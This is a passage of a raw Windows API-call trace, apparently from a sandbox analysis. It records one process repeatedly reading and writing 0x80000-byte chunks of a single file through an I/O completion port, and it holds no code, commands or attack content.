[0138.149] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.170] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.171] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.173] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.173] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.174] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.176] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.178] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.178] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.196] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.198] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.200] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.200] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.201] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.203] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.204] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.204] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.214] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.223] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.224] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.224] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.226] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.227] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.235] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.235] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.253] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.254] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.256] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.256] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.257] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.259] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.260] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.260] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.280] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.282] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.283] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.284] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.285] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.286] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.288] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.288] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.311] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.313] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.315] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.315] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.319] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.321] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.323] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.323] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.375] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.377] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.378] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.378] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.380] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.381] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.383] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.383] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.398] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.400] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.401] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.401] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.411] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.413] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.414] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.414] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.467] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.469] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.470] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.471] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.472] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.474] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.475] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.475] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.537] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.539] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.540] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.541] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.542] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.556] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.558] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.558] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.572] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.575] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.576] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.576] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.578] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.579] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.581] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.581] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0138.605] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.607] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0138.609] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0138.609] ReadFile (in: hFile=0x610, 